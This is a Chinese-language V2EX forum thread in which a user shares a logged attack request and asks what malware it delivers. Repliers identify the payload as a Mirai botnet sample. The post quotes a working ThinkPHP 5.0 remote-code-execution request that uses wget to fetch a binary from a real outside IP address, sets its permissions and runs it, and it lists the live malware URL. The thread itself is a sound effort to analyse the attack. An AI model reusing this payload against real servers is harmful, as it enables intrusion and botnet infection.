首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
urmyfaith
V2EX  ›  开源软件

一起来分析下这个是啥病毒?

  •   
  •   urmyfaith · 2021-09-27 20:11:52 +08:00 · 1712 次点击
    这是一个创建于 1137 天前的主题,其中的信息可能已经有所发展或是发生改变。

    http://5.182.210.129/bins/

    http://5.182.210.129/bins/sora.x86 请不要点击执行。

    "GET /thinkphp_5.0.21/?s=index/%5Cthink%5Capp/invokefunction

&function=call_user_func_array
&vars[0]=system
&vars[1][]=cd%20/tmp;

wget%20http://5.182.210.129/bins/sora.x86;
cat%20sora.x86%20%3E%20xdsf;
chmod%20777%20xdsf;
./xdsf%20
thinkphp HTTP/1.0",

    这种是全网试么? 利用 thinkPhp 漏洞,远程执行代码?

    问题来了,这个 exe sora.x86 里面究竟是什么?

  • thinkphp
  • xdsf
  • vars
  • sora
    5 条回复    2021-09-28 10:17:32 +08:00
    opengps
        1
    opengps  
       2021-09-27 20:15:31 +08:00
    “请不要点击执行”一定会有人执行的
    leloext
        2
    leloext  
       2021-09-27 20:53:47 +08:00
    mirai 后门
    crab
        3
    crab  
       2021-09-27 21:20:22 +08:00
    upx 壳 elf linux 上的?
    andy1ee11o2
        4
    andy1ee11o2  
       2021-09-27 21:55:05 +08:00
    Mirai Botnet
    urmyfaith
        5
    urmyfaith  
    OP
       2021-09-28 10:17:32 +08:00
    有人分析过?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2497 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 15:45 · PVG 23:45 · LAX 07:45 · JFK 10:45
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.